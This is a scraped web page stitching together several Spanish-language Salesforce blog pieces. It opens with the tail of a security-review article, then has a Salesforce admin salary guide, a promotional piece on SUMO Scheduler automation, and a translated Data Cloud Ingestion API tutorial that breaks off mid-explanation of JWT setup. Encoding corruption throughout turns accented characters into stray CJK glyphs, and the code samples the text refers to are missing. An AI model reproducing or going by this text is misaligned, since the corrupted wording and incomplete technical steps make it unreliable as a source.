Salesforce Product Security tambi茅n utiliza Code Analyzer , PMD para VS Code y Checkmarx para revisar el c贸digo fuente del paquete Salesforce. Tambi茅n utilizan la base de datos CVE y el esc谩ner Qualys SSL en la mayor铆a de los env铆os.

Si tiene problemas de seguridad y necesita orientaci贸n t茅cnica, los socios ISV pueden registrarse para obtener horas de oficina gratuitas con nuestros ingenieros de seguridad a trav茅s del Portal de seguridad para socios .

Por 煤ltimo, no podemos recomendar lo suficiente Trailhead en t茅rminos de preparaci贸n para revisiones de seguridad. Vale la pena dedicar tiempo a la ruta Desarrollar aplicaciones web seguras y tambi茅n acabamos de renovar el m贸dulo Revisi贸n de seguridad de AppExchange , que analiza el proceso de env铆o de un extremo a otro.

Sobre el Autor

Anika Teppo es evangelista t茅cnica en Salesforce. Ha estado trabajando con el equipo de revisi贸n de seguridad de AppExchange en Salesforce desde 2017, y su funci贸n actual consiste en hacer que Salesforce Labs y las soluciones internas se revisen y publiquen en AppExchange.

Obtenga las 煤ltimas publicaciones de blog y episodios de podcasts para desarrolladores de Salesforce a trav茅s de Slack o RSS.

A帽adir a holgura Suscr铆bete a RSS

Continue reading

Gu铆a salarial de administrador de Salesforce (+ consejos para ganar m谩s) – Inspire Planner

Gu铆a salarial de administrador de Salesforce (+ consejos para ganar m谩s) - Inspire Planner

Una estad铆stica sorprendente de Skuid revela que entre el 20 y el 70 % de los proyectos de CRM fallan debido a la falta de experiencia profesional. Las empresas sin administradores de Salesforce capacitados son similares a los propietarios de autom贸viles costosos de alto rendimiento pero sin licencia de conducir. Lo tienes, pero no puedes usarlo en todo su potencial. Como un h谩bil conductor detr谩s del volante, los administradores de Salesforce garantizan el funcionamiento perfecto de Salesforce, la plataforma de CRM l铆der en el mundo. Pueden adaptar la plataforma para que se adapte a las necesidades comerciales 煤nicas, navegando sus complejidades con facilidad. Pero surge una pregunta importante: 驴qu茅 factores influyen significativamente en el salario de un administrador de Salesforce?

En esta Gu铆a de salario de administrador de Salesforce, profundizaremos en estas preguntas y descubriremos informaci贸n crucial en el camino. A partir de esta gu铆a, puede esperar descubrir:

  • El papel fundamental de un administrador de Salesforce en la industria tecnol贸gica
  • Un an谩lisis completo de los salarios de los administradores de Salesforce, teniendo en cuenta factores como la experiencia, la ubicaci贸n, la industria y las certificaciones.
  • El impacto de las certificaciones y la experiencia en el salario de un administrador de Salesforce
  • Variaciones geogr谩ficas de los salarios de los administradores de Salesforce en EE. UU., India y en todo el mundo
  • Efecto de los cambios de trabajo frente a la permanencia en el trabajo en la progresi贸n salarial del administrador de Salesforce
  • Consejos pr谩cticos para los administradores de Salesforce que buscan aumentar sus ingresos

Profundicemos y desentra帽emos los aspectos importantes de ser un administrador de Salesforce exitoso.

驴Qu茅 hace un administrador de Salesforce?

Los administradores de Salesforce tienen muchas funciones. Administran usuarios, datos y seguridad, personalizan Salesforce para satisfacer las necesidades comerciales, crean informes y paneles y brindan capacitaci贸n a los usuarios finales. Su funci贸n requiere una combinaci贸n de habilidades t茅cnicas y blandas, incluida la resoluci贸n de problemas, la comunicaci贸n, la gesti贸n de proyectos y una comprensi贸n profunda de las funcionalidades de Salesforce.

Seg煤n un estudio realizado por IDC, se prev茅 que el ecosistema de Salesforce, incluidos sus clientes y socios, genere 9,3 millones de nuevos puestos de trabajo y contribuya a $1,6 billones en nuevos ingresos comerciales a nivel mundial para 2026. A medida que m谩s empresas adopten Salesforce, el papel de Salesforce Los administradores solo se volver谩n m谩s fundamentales, haciendo de esta profesi贸n no solo un trabajo, sino una opci贸n de carrera pr贸spera.

Salario de administrador de Salesforce en los EE. UU.

Salario de nivel de entrada y salario promedio anual del administrador de Salesforce

Seg煤n Payscale, para aquellos que reci茅n comienzan su viaje como administradores de Salesforce, el salario inicial en los EE. UU. es de aproximadamente $ 61,000 por a帽o. Esta cifra representa el salario inicial est谩ndar para los administradores que tienen menos de un a帽o de experiencia. La cifra puede cambiar seg煤n variables como la ubicaci贸n, la industria y el tama帽o de la empresa.

El salario anual promedio de los administradores de Salesforce en los EE. UU. es de alrededor de $ 73,500. Esta cifra es un promedio de varios niveles de experiencia, industrias y ubicaciones dentro de los EE. UU. Incluye el salario base, aguinaldos, participaci贸n en las utilidades y cualquier otro beneficio econ贸mico, en su caso.

Variaciones del salario del administrador de Salesforce seg煤n la experiencia y la industria

Con 2 a 5 a帽os de experiencia, los administradores pueden esperar ganar alrededor de $71,000 por a帽o. Los administradores s茅nior de Salesforce con m谩s de 5 a帽os de experiencia pueden ganar entre $86 000 y $92 000 por a帽o, seg煤n los datos de Payscale.

La industria tambi茅n juega un factor clave en la determinaci贸n del salario. Por ejemplo, los administradores de Salesforce en los sectores de tecnolog铆a y finanzas a menudo ganan m谩s que los de otras industrias debido a la mayor demanda y complejidad de las tareas en estos sectores.

Variaciones geogr谩ficas en el salario del administrador de Salesforce

La ubicaci贸n geogr谩fica es otro factor clave que influye en los salarios. Los estados que tienen costos de vida m谩s altos, como California y Nueva York, frecuentemente ofrecen salarios m谩s altos como contrapeso. De manera similar, los estados con una alta concentraci贸n de empresas tecnol贸gicas, como Washington y Texas, tambi茅n tienden a ofrecer salarios m谩s altos debido al mercado laboral competitivo.

Salesforce Admin Salario en India

India es uno de los mercados m谩s grandes para el talento tecnol贸gico y juega un papel crucial en el ecosistema de Salesforce. Los ingresos de los administradores de Salesforce en la India tambi茅n est谩n determinados por numerosas variables, como la experiencia, la ubicaci贸n geogr谩fica, la industria y las certificaciones.

Seg煤n Talent.com, la estructura del salario del administrador de Salesforce en India var铆a ampliamente, dependiendo de varios factores. En promedio, pueden esperar ganar 鈧 1,100,000 por a帽o. Para aquellos que reci茅n comienzan su viaje de Salesforce, los salarios de nivel de entrada son alrededor de 鈧 500,000 por a帽o.

Sin embargo, a medida que los administradores de Salesforce acumulan experiencia y perfeccionan sus habilidades, su potencial de ingresos crece significativamente. Los profesionales m谩s experimentados en este campo pueden obtener salarios de hasta 鈧 1 737 500 por a帽o, lo que demuestra la importante progresi贸n financiera posible en esta carrera.

Salario del administrador de Salesforce a nivel mundial

En el panorama tecnol贸gico en constante evoluci贸n, los administradores de Salesforce desempe帽an un papel fundamental a nivel mundial. Aqu铆 hay un resumen de los salarios promedio de los administradores de Salesforce en varios pa铆ses a trav茅s de diferentes niveles de experiencia:

Salesforce Admin Salary Guide Globally de Inspire Planner, una aplicaci贸n de gesti贸n de proyectos nativa de SalesforceSalesforce Admin Salary Guide Globally de Inspire Planner, una aplicaci贸n de gesti贸n de proyectos nativa de Salesforce

Estos n煤meros pueden variar seg煤n numerosos factores, incluidos el pa铆s, la industria y el tama帽o de la organizaci贸n. A medida que los administradores obtienen m谩s experiencia y dominan las funcionalidades de Salesforce, sus salarios aumentan significativamente.

Influencia de la certificaci贸n y la experiencia en el salario

El poder de las certificaciones y la experiencia de Salesforce para configurar el salario de un administrador de Salesforce no se puede subestimar. Seg煤n la Encuesta de salarios de Mason Frank, se revel贸 que el 43% de los encuestados vieron un aumento en su salario despu茅s de obtener una certificaci贸n, lo que destaca la correlaci贸n directa entre la mejora profesional y las recompensas financieras.

Tambi茅n es fundamental centrarse estrat茅gicamente en las certificaciones m谩s pertinentes. La certificaci贸n de Administrador Avanzado, por ejemplo, es muy buscada ya que valida la experiencia en caracter铆sticas y funcionalidades avanzadas de Salesforce. Del mismo modo, tener una certificaci贸n de Platform App Builder puede brindar una ventaja considerable para aquellos que aspiran a validar su competencia en el dise帽o, la creaci贸n y la implementaci贸n de aplicaciones personalizadas en la plataforma Salesforce.

La experiencia tambi茅n tiene un peso inmenso en el salario de un administrador de Salesforce. El mismo estudio de Mason Frank sugiere que un profesional de Salesforce con m谩s de cinco a帽os de experiencia puede ganar hasta un 20% m谩s que sus contrapartes con menos experiencia.

Sin embargo, si bien es beneficioso tener m煤ltiples certificaciones, es crucial equilibrar esto con la adquisici贸n de experiencia en el mundo real. Los empleadores valoran la experiencia pr谩ctica, por lo que centrarse 煤nicamente en las certificaciones sin aplicar las habilidades aprendidas podr铆a hacerte parecer sobrecualificado o fuera de contacto con los aspectos pr谩cticos del puesto.

Tenencia de trabajo vs. Salto de trabajo: 驴Qu茅 afecta m谩s la progresi贸n salarial?

En el sector de la tecnolog铆a, y espec铆ficamente dentro de los roles de Salesforce, a menudo vemos una mezcla de experiencias. Para algunos, la lealtad a una sola organizaci贸n conduce a una progresi贸n salarial constante, especialmente si pueden obtener un ascenso dentro de la organizaci贸n. Sin embargo, otros descubren que cambiar de trabajo cada pocos a帽os acelera el crecimiento de su salario de administrador de Salesforce debido a la "prima de salto de trabajo".

Seg煤n los hallazgos del Instituto de Investigaci贸n ADP, los empleados que se apegan a sus trabajos han visto crecer sus salarios en un 5,9 %, mientras que aquellos que cambian de trabajo ven un salto mayor, con un aumento del 8,0 %.

Sin embargo, no se trata solo de perseguir el salario m谩s alto. Cambiar de trabajo puede conducir potencialmente a percepciones de inestabilidad o falta de compromiso, lo que podr铆a afectar las perspectivas laborales futuras. Por otro lado, permanecer en una empresa durante un per铆odo prolongado podr铆a limitar la exposici贸n a diversas experiencias y, potencialmente, ralentizar el ritmo de desarrollo de habilidades y progresi贸n profesional.

Por lo tanto, si bien cambiar de trabajo puede generar una ganancia financiera inmediata, considere otros factores, como las oportunidades de aprendizaje, la cultura laboral, el equilibrio entre el trabajo y la vida personal y el crecimiento profesional a largo plazo al tomar tales decisiones. Despu茅s de todo, una carrera satisfactoria es algo m谩s que las cifras de su cheque de pago.

Consejos para aumentar el salario del administrador de Salesforce

Estos son algunos consejos pr谩cticos para los administradores de Salesforce que buscan aumentar sus ingresos.

  • Obtenga certificaciones de Salesforce : Salesforce ofrece una variedad de certificaciones que certifican su comprensi贸n y experiencia en varias facetas de la plataforma. Las certificaciones como Administrador avanzado o Creador de aplicaciones de plataforma no son solo muestras de su dedicaci贸n para dominar la plataforma; tambi茅n dan fe de su capacidad para manejar tareas m谩s complejas. Obtener estas certificaciones puede mejorar considerablemente su valor de mercado.
  • Especial铆cese en un 谩rea particular : aunque la versatilidad es un rasgo deseable en los administradores de Salesforce, perfeccionar un 谩rea espec铆fica puede aumentar su valor para las empresas. Por ejemplo, centrarse en CPQ (Configurar, Precio, Cotizar) puede abrir oportunidades en sectores donde la fijaci贸n de precios de productos o servicios es compleja. Al convertirse en un experto en CPQ, se posiciona como un especialista que puede optimizar procesos complejos, aumentando as铆 su potencial de ingresos. Consulte nuestra gu铆a para conocer los mejores recursos para la capacitaci贸n de Salesforce.
  • Agregue valor al negocio : los administradores de Salesforce pueden aumentar su salario demostrando su valor para el negocio. Esto podr铆a implicar la automatizaci贸n de procesos en Salesforce, la implementaci贸n de nuevas funciones que aumenten la eficiencia o la capacitaci贸n de usuarios finales para utilizar mejor la plataforma. Al mostrar c贸mo su trabajo contribuye a los resultados de la empresa, puede presentar argumentos s贸lidos a favor de un salario m谩s alto. Aqu铆 puede encontrar m谩s consejos sobre c贸mo ser un administrador de Salesforce exitoso.
  • Comprenda su valor : use recursos como la Encuesta anual de salarios de Mason Frank, Payscale o Glassdoor para obtener una imagen realista de cu谩l es el salario t铆pico de un administrador de Salesforce seg煤n su ubicaci贸n, industria y nivel de experiencia. Esto lo ayuda a medir su valor de mercado y proporciona una base para comenzar las negociaciones.
  • Est茅 preparado : antes de la negociaci贸n, enumere sus principales contribuciones y logros. Incluya proyectos o iniciativas espec铆ficas que hayan tenido un impacto sustancial en el negocio. Esto puede proporcionar evidencia convincente de su val铆a.
  • Practique la escucha activa : la negociaci贸n no se trata solo de hacer demandas; tambi茅n se trata de comprender la perspectiva de la otra parte. Escuchar puede ayudarlo a identificar lo que es importante para el empleador y encontrar puntos en com煤n.
  • Busque un mentor : busque profesionales que est茅n un par de etapas por delante de usted en su carrera en Salesforce, preferiblemente de 2 a 5 a帽os. Estas personas tendr谩n una experiencia reciente y relevante que se alinea estrechamente con los desaf铆os que es probable que encuentre.

Resumen

A medida que la ola de transformaci贸n digital sigue aumentando, la demanda de administradores de Salesforce capacitados se dispara. En particular, las funciones de estos profesionales se extienden m谩s all谩 de la competencia t茅cnica y exigen una combinaci贸n armoniosa de habilidades blandas y una comprensi贸n profunda de los procesos comerciales.

No se puede subestimar la influencia de las certificaciones, la experiencia y la ubicaci贸n geogr谩fica en el salario de un administrador de Salesforce. Un administrador certificado de Salesforce, especialmente con habilidades de nicho como CPQ, puede esperar un aumento salarial, con incrementos adicionales paralelos a su experiencia acumulada. Los datos muestran que los cambios frecuentes de trabajo tambi茅n pueden contribuir a un aumento m谩s r谩pido de los ingresos en comparaci贸n con permanencias m谩s largas en una empresa.

Sin embargo, no se trata solo de buscar certificaciones o cambiar de trabajo. La creaci贸n de una red s贸lida, la b煤squeda de mentores y el perfeccionamiento de sus habilidades de negociaci贸n son esenciales para mejorar su valor y, en consecuencia, su potencial de ingresos.

Para los posibles administradores de Salesforce o los experimentados que buscan avanzar, recuerde que es una combinaci贸n de aprendizaje continuo, movimientos profesionales estrat茅gicos y aprovechar la vibrante comunidad de Salesforce lo que lo colocar谩 en los tramos salariales m谩s altos.

Continue reading

Desatando los superpoderes de administraci贸n de Salesforce: 隆Impulse la colaboraci贸n en equipo, sobrecargue la eficiencia, gesti贸n de datos maestros!

Desatando los superpoderes de administraci贸n de Salesforce: 隆Impulse la colaboraci贸n en equipo, sobrecargue la eficiencia, gesti贸n de datos maestros!

脷ltima actualizaci贸n el 31 de julio de 2023 por Rakesh Gupta

Durante la 煤ltima d茅cada, el papel de un administrador de Salesforce ha evolucionado dr谩sticamente, manteniendo el ritmo del panorama din谩mico de las ventas y la gesti贸n de las relaciones con los clientes. Lo que alguna vez fue principalmente una posici贸n de entrada de datos se ha convertido en un rol multifac茅tico que abarca la planificaci贸n estrat茅gica, el an谩lisis y la optimizaci贸n de procesos. A medida que las empresas reconozcan la importancia de Salesforce para impulsar el crecimiento y mejorar las experiencias de los clientes, los administradores proporcionar谩n un puente fundamental entre la tecnolog铆a y el 茅xito comercial.

Este art铆culo explorar谩 c贸mo los administradores pueden aprovechar la automatizaci贸n de procesos junto con el ecosistema de Salesforce para fomentar la colaboraci贸n en equipo, mejorar la eficiencia organizacional y mejorar la gesti贸n de datos.

Uso de la automatizaci贸n de correo electr贸nico de Salesforce para la programaci贸n

La automatizaci贸n del correo electr贸nico se utiliza para optimizar varios aspectos de la comunicaci贸n por correo electr贸nico con clientes potenciales y clientes dentro de la plataforma de Salesforce para garantizar una programaci贸n de citas r谩pida y eficiente. Permite a las empresas administrar de manera eficiente sus campa帽as de marketing y ventas por correo electr贸nico, la participaci贸n del cliente y las reservas.

En los 煤ltimos a帽os, la automatizaci贸n revolucion贸 los procesos de ventas y soporte al agilizar la reserva de citas, reducir la carga de trabajo manual y brindar a los clientes opciones convenientes de autoservicio. Actualmente, los administradores de Salesforce pueden aprovechar herramientas como SUMO Scheduler junto con flujos nativos y alertas por correo electr贸nico para enviar autom谩ticamente invitaciones a citas. Al crear disparadores que monitorean campos de datos espec铆ficos asociados con registros de contactos y lanzar flujos personalizados, los administradores pueden asegurarse de que los clientes potenciales siempre puedan programar citas, independientemente de la hora del d铆a o la ubicaci贸n.

Actualizaciones autom谩ticas de temas: haga que sus citas se destaquen

Las reuniones de cara al cliente son vitales para los equipos de ventas y soporte, y las citas perdidas o canceladas pueden afectar negativamente los objetivos estrat茅gicos y el resultado final. Los administradores de Salesforce pueden aprovechar las actualizaciones autom谩ticas de temas dentro de la programaci贸n de citas para reducir las cancelaciones de manera efectiva y aumentar la participaci贸n en las citas. Al implementar esta funcionalidad, los administradores pueden mejorar la comunicaci贸n, brindar claridad e infundir confianza en el proceso de citas para los clientes y la organizaci贸n.

Se puede activar una actualizaci贸n autom谩tica del tema para incluir detalles esenciales como la fecha, la hora, la ubicaci贸n y el prop贸sito de la cita al programarla. Este mensaje de confirmaci贸n sirve como recordatorio para el cliente y reduce las posibilidades de cancelaciones involuntarias o de no presentarse.

Las actualizaciones autom谩ticas de temas tambi茅n se pueden personalizar para atender a clientes individuales. Los administradores pueden incluir detalles personalizados, como el nombre del cliente o referencias de citas espec铆ficas, para captar su atenci贸n y crear una sensaci贸n de personalizaci贸n. Esto ayuda a fomentar una conexi贸n con el cliente y refuerza su compromiso con la cita.

Finalmente, en caso de cambios o actualizaciones en la cita, los administradores pueden usar actualizaciones autom谩ticas de temas para comunicar la informaci贸n revisada. Esto asegura que los clientes est茅n informados sobre cualquier modificaci贸n en tiempo real, minimizando la confusi贸n o la necesidad de cancelar debido a detalles desactualizados o inexactos.

Al permitir la flexibilidad en la programaci贸n y el mantenimiento de registros precisos dentro de Salesforce con la ayuda de l铆neas de asunto automatizadas, los administradores pueden optimizar de manera efectiva su proceso de ventas, mejorar la experiencia del usuario y fortalecer las relaciones con los clientes.

Uso de campos de correo electr贸nico flexibles para una mayor precisi贸n

La flexibilidad es clave para satisfacer las necesidades 煤nicas de los clientes, y los administradores de Salesforce pueden aprovechar el poder de los campos de correo electr贸nico para notificaciones personalizadas, sin importar cu谩n complejas sean. Esta personalizaci贸n permite una experiencia m谩s personalizada que cumple con requisitos espec铆ficos, como el cumplimiento normativo o las pol铆ticas internas.

En el contexto de Salesforce, los campos de correo electr贸nico se utilizan para recopilar y almacenar las direcciones de correo electr贸nico de los clientes. Estos campos aseguran que los datos ingresados sigan el formato adecuado, evitando entradas incorrectas o no v谩lidas. Las direcciones de correo electr贸nico recopiladas a trav茅s de estos campos se pueden usar para enviar recordatorios, actualizaciones, mensajes de seguimiento y otras notificaciones relacionadas con citas. Cada campo de correo electr贸nico act煤a como una medida confiable de capturar y utilizar informaci贸n de contacto para mejorar el compromiso y mantener canales de comunicaci贸n efectivos.

Los campos de correo electr贸nico de Salesforce pueden mejorar la precisi贸n al garantizar que la informaci贸n de contacto almacenada en CRM est茅 actualizada y sea confiable. Al utilizar campos de correo electr贸nico dedicados dentro de Salesforce, los representantes de ventas pueden capturar y almacenar direcciones de correo electr贸nico espec铆ficas de personas o entidades con precisi贸n. Esto ayuda a eliminar el riesgo de usar direcciones de correo electr贸nico desactualizadas o incorrectas asociadas con otros campos, como informaci贸n de contacto personal o comercial, lo que da como resultado comunicaciones por correo electr贸nico m谩s confiables, tasas de rebote reducidas y precisi贸n de datos mejorada.

Automatice la creaci贸n de clientes potenciales en Salesforce en el momento de la reserva

Las herramientas de programaci贸n nativas de Salesforce permiten a los equipos de ventas automatizar la creaci贸n de clientes potenciales, lo que garantiza una captura precisa de la informaci贸n y los datos demogr谩ficos de los clientes potenciales en el CRM. Al automatizar el proceso de creaci贸n de clientes potenciales tan pronto como se programa una cita, los administradores pueden ahorrar tiempo, mantener la integridad de los datos y evitar la redundancia. Los flujos automatizados agilizan el proceso y eliminan los errores de entrada manual. La precisi贸n mejorada y la colaboraci贸n entre las partes interesadas mejoran las tasas de conversi贸n de clientes potenciales y proporcionan datos confiables para informes y an谩lisis.

Para automatizar r谩pidamente la creaci贸n de clientes potenciales en Salesforce en el momento de la reserva, puede seguir estos pasos:

  1. Identifique el evento desencadenante : determine el evento o la acci贸n espec铆ficos que deben desencadenar la creaci贸n de clientes potenciales. En este caso, ser铆a la reserva de una cita.
  2. Configure un flujo de Salesforce : utilice el flujo de Salesforce para crear una regla que active el proceso de creaci贸n de clientes potenciales. Especifique los criterios para cu谩ndo debe activarse el flujo, como cuando se reserva una nueva cita.
  3. Definir asignaci贸n de campos : configure la asignaci贸n de campos para asegurarse de que la informaci贸n relevante de la cita se transfiera correctamente al registro de clientes potenciales. Puede asignar campos como el nombre del participante, la informaci贸n de contacto, los detalles de la cita y otros puntos de datos relevantes.
  4. Crear el registro de prospecto : configure Salesforce Flow para crear un nuevo registro de prospecto con los datos asignados. Aseg煤rese de que todos los campos obligatorios est茅n completos y que el registro de cliente potencial est茅 asociado con la campa帽a o la fuente adecuada.
  5. Probar y validar : pruebe el proceso automatizado de creaci贸n de clientes potenciales reservando una cita de muestra y verificando que el registro de clientes potenciales se cree con los datos esperados. Valide que el registro de prospectos aparezca en la cola de prospectos designada o en las reglas de asignaci贸n.
  6. Supervisar y perfeccionar : Supervise continuamente el proceso de automatizaci贸n de creaci贸n de clientes potenciales para garantizar su eficacia y precisi贸n. Realice los ajustes o mejoras necesarios en funci贸n de los comentarios, los cambios en los requisitos comerciales o los problemas de calidad de los datos.

Al automatizar la creaci贸n de clientes potenciales en Salesforce en el momento de la reserva, los representantes de ventas y los administradores pueden ahorrar tiempo, garantizar la precisi贸n de los datos y mantener un proceso de gesti贸n de clientes potenciales optimizado. Esta automatizaci贸n facilita la captura eficiente de clientes potenciales, reduce el esfuerzo manual y mejora la productividad del equipo de ventas.

Conclusi贸n:

Los flujos de programaci贸n automatizados, junto con las poderosas capacidades de SUMO Scheduler, simplifican y mejoran los procesos de trabajo, ahorran tiempo, reducen errores y mejoran la satisfacci贸n del cliente. Al adoptar la automatizaci贸n, los administradores de Salesforce pueden impulsar mejoras significativas en la eficiencia, la productividad y el rendimiento comercial general. La optimizaci贸n de los procesos de programaci贸n y el aprovechamiento de los flujos de automatizaci贸n en Salesforce con SUMO Scheduler es una combinaci贸n ganadora para las empresas que buscan optimizar sus operaciones. 隆Adopte la revoluci贸n de la automatizaci贸n hoy e impulse a su equipo de ventas a nuevos niveles de 茅xito!

Haga clic aqu铆 para visitar SUMO Scheduler en Salesforce AppExchange y obtener m谩s informaci贸n sobre el poder de la programaci贸n autom谩tica de autoservicio .

Evaluaci贸n formativa:

隆Quiero saber de ti!

驴Qu茅 es una cosa que aprendiste de esta publicaci贸n? 驴C贸mo imagina aplicar este nuevo conocimiento en el mundo real? Si茅ntase libre de compartir en los comentarios a continuaci贸n.

Continue reading

Cargue datos mediante programaci贸n con la API de ingesta 鈽侊笍

Cargue datos mediante programaci贸n con la API de ingesta 鈽侊笍

Esta es una traducci贸n que desde EGA Futura ofrecemos como cortes铆a a toda la Ohana y comunidad de programadores , consultores , administradores y arquitectos de Salesforce para toda Iberoam茅rica .

El enlace a la publicaci贸n original, lo encontrar谩s al final de este art铆culo.

Cargue datos mediante programaci贸n con la API de ingesta | Blog de desarrolladores de Salesforce

Salesforce Data Cloud ofrece varios conectores predefinidos para la importaci贸n de datos. Estos le permiten conectar otra organizaci贸n de Salesforce, una instancia de Marketing Cloud, almacenamientos de datos como Amazon S3 o cualquier otra fuente admitida por MuleSoft Salesforce Data Cloud Connector . Para conectarse a un sistema de terceros, puede utilizar la API de ingesta .

La API de ingesta es una interfaz RESTful que facilita la carga de datos mediante programaci贸n en Data Cloud. Admite patrones de interacci贸n masiva y de transmisi贸n. El patr贸n de transmisi贸n usa JSON como su formato, cargando datos en micro lotes a trav茅s de la API REST. El patr贸n masivo, por otro lado, emplea el formato CSV y carga datos usando trabajos.

En esta publicaci贸n de blog, analizaremos c贸mo configurar el conector de la API de ingesta y comenzar a cargar datos mediante programaci贸n utilizando los patrones Streaming y Bulk.

Cu谩ndo usar la ingesti贸n Streaming vs Bulk

Ingesti贸n de transmisi贸n Ingesti贸n a granel
Al actualizar peque帽os microlotes de registros casi en tiempo real Al mover grandes vol煤menes de datos en un programa diario, semanal o mensual
Cuando se utilizan sistemas de origen de datos que se basan en arquitecturas de transmisi贸n modernas Al usar sistemas heredados, donde solo puede exportar datos durante las horas de menor actividad
Al crear eventos de captura de datos modificados Al usar una nueva organizaci贸n de Data Cloud que desea rellenar con 30, 60 o m谩s de 90 d铆as de datos
Al consumir datos de webhooks

Para configurar la API de ingesta, deber谩 seguir cuatro pasos de requisitos previos:

  • Crear un conector de API de ingesta
  • Crear e implementar un flujo de datos
  • Crear una aplicaci贸n conectada
  • Solicitar un token de acceso a la nube de datos

Veamos el proceso de creaci贸n y configuraci贸n de un conector de ingesta para comenzar a cargar datos en Data Cloud.

Creaci贸n de un conector de API de ingesta

Supongamos que tiene acceso a Data Cloud. Para conectar una nueva fuente de API de ingesta mediante el conector de API de ingesta, vaya a Configuraci贸n de nube de datos y seleccione API de ingesta .

Aqu铆 encontrar谩 todos los conectores disponibles en su organizaci贸n. Para crear uno nuevo, haga clic en Conectar y proporcione un nombre. Para nuestra aplicaci贸n de muestra, trabajaremos con una empresa de energ铆a solar ficticia. Estamos interesados en recibir eventos de m茅tricas relacionadas con el rendimiento energ茅tico de sus paneles solares.

Una vez que se haya creado el conector, necesitaremos decirle a Data Cloud qu茅 tipo de datos estamos esperando. Para esto, necesitaremos cargar un archivo de esquema utilizando la especificaci贸n OpenAPI. Este archivo de esquema tiene requisitos espec铆ficos, as铆 que aseg煤rese de consultar la documentaci贸n para obtener m谩s informaci贸n.

A continuaci贸n se muestra un ejemplo del archivo de esquema que cargaremos, que representa un solar_panel_event . Los campos clave a tener en cuenta incluyen event_id , que ser谩 煤nico para cada evento y luego se asignar谩 en Data Cloud como clave principal. Otro es customer_id , que nos ser谩 煤til para mapear el evento con un cliente de nuestra organizaci贸n. Finalmente, date_time representa la hora del evento.

panel_solar_event.yaml

Una vez que carguemos el esquema, podremos obtener una vista previa de sus campos y tipos de datos, y luego guardarlo en nuestro conector.

Ahora que nuestro conector tiene un esquema, podemos decir que est谩 creado. Sin embargo, a煤n no est谩 listo para comenzar a recibir datos. Necesitamos crear un flujo de datos para este prop贸sito.

Nota: Dado que los esquemas pueden evolucionar con el tiempo, tambi茅n puede usar la interfaz del conector de la API de ingesta para actualizar el esquema y agregar nuevos campos a su objeto de datos seg煤n sea necesario.

Creaci贸n e implementaci贸n de un flujo de datos

Ya tenemos listo nuestro conector API de ingesta. Ahora es el momento de establecer una conexi贸n para comenzar a importar datos. Para eso, necesitamos crear un flujo de datos . Una vez que el flujo de datos est谩 activo, podemos comenzar a ingerir datos en Data Cloud y almacenarlos como un objeto de Data Lake.

Para crear un nuevo flujo de datos, vaya a su pesta帽a en la aplicaci贸n Data Cloud, haga clic en Nuevo , seleccione Ingestion API y luego haga clic en Siguiente .

Nota: La opci贸n API de ingesta est谩 deshabilitada si no tiene ninguna fuente de ingesta conectada.

A continuaci贸n, ver谩 los diferentes objetos que est谩n asociados con su esquema. En nuestro caso, seleccione el objeto solar_panel_event y haga clic en Siguiente .

Al crear un flujo de datos, deber谩 seleccionar una categor铆a o tipo de datos en ese flujo de datos. Hay tres categor铆as: Compromiso , Perfil y Otro .

Compromiso Un conjunto de datos que representa un compromiso basado en series de tiempo, como un evento, interacci贸n con el cliente, interacci贸n web, etc.

Cuando se selecciona, el men煤 desplegable Campo de hora del evento aparece en la interfaz de usuario.

Perfil Un conjunto de datos que representa:

鈥 Una lista de consumidores con identificadores, como identificaciones de consumidores, direcciones de correo electr贸nico o n煤meros de tel茅fono

鈥 Una lista de empresas o cuentas con ID de cuenta

鈥 Una lista de empleados o cualquier otra poblaci贸n por la que desee segmentar o utilizar como poblaci贸n inicial del segmento

Otro Un conjunto de datos que no es un compromiso o un perfil, como informaci贸n de productos o tiendas.

Para nuestro ejemplo, dado que estamos planeando recibir eventos, seleccionaremos Compromiso . Mapearemos el event_id como la clave principal y la date_time como el campo de hora del evento.

Ahora que nuestros datos est谩n configurados, es hora de implementarlos. Despu茅s de revisar los flujos de datos que se van a crear, hagamos clic en Implementar para activarlos.

Ahora, echemos un vistazo a la p谩gina de detalles del flujo de datos. Aqu铆 podemos ver el objeto Data Lake que se ha creado en Data Cloud. Puede identificar un objeto de Data Lake por su sufijo __dll . Desde esta misma interfaz, puede comenzar a asignar sus datos a los objetos de su organizaci贸n para crear objetos de modelo de datos (parte del proceso de armonizaci贸n de Data Cloud). Sin embargo, no cubriremos ese tema en esta publicaci贸n de blog, pero tenemos un excelente video con Danielle Larregui que le muestra c贸mo hacerlo.

Nuestro conector API de ingesta est谩 listo para comenzar a recibir datos de sistemas de terceros. Para confirmar, regresemos a la interfaz de configuraci贸n de la API de ingesta, donde puede ver que el estado del conector es En uso .

Creaci贸n de una aplicaci贸n conectada

La API de ingesta admite todos los flujos de OAuth 2.0 admitidos por otras API REST de Salesforce. Para cargar datos mediante la API de ingesta, su aplicaci贸n conectada requiere los siguientes 谩mbitos:

脕mbitos de OAuth requeridos

cdp_ingest_api Acceda y administre sus datos de API de ingesta de nube de datos
API Accede y administra tus datos
refresco_token, acceso_sin conexi贸n Realizar solicitudes en su nombre en cualquier momento

Adem谩s, nuestra aplicaci贸n conectada requerir谩 un certificado digital. Para crear uno, puede ejecutar el siguiente comando usando el comando openssl :

Este comando crear谩 dos archivos, salesforce.key , que es la clave privada, y salesforce.crt , que es la clave p煤blica.

Nota : si no tiene instalado el comando openssl , puede instalarlo desde el sitio web de OpenSSL .

Para saber c贸mo crear una aplicaci贸n conectada, consulte la documentaci贸n oficial.

Solicitud de un token de acceso a la nube de datos

Para este ejemplo, usaremos el flujo de soporte JWT de OAuth 2.0 . Primero, necesitaremos crear un JWT (JSON Web Token) para solicitar un token de acceso.

Para crear un JWT, configurar谩 el encabezado para usar el algoritmo RSA256 .

Encabezado JWT

Luego, configure las siguientes notificaciones, teniendo en cuenta algunas notificaciones importantes:

  • iss: la clave de consumidor de OAuth/ID de cliente de su aplicaci贸n conectada
  • sub: el nombre de usuario de su organizaci贸n de Data Cloud
  • exp: el tiempo de vencimiento del token, expresado como una marca de tiempo de 茅poca

reclamos JWT

Nota : La 茅poca de Unix (o la hora de Unix o la hora POSIX o la marca de tiempo de Unix) es la cantidad de segundos que han transcurrido desde el 1 de enero de 1970 (medianoche UTC/GMT).

A continuaci贸n, deber谩 utilizar el algoritmo JWT para obtener el token completo y verificado.

Pero seamos honestos, no queremos crear un JWT manualmente. Para esto, utilizaremos el sitio web JWT.io para simplificar el proceso. Aseg煤rese de que el mensaje Firma verificada aparezca a continuaci贸n, lo que indica que nuestro JWT es v谩lido.

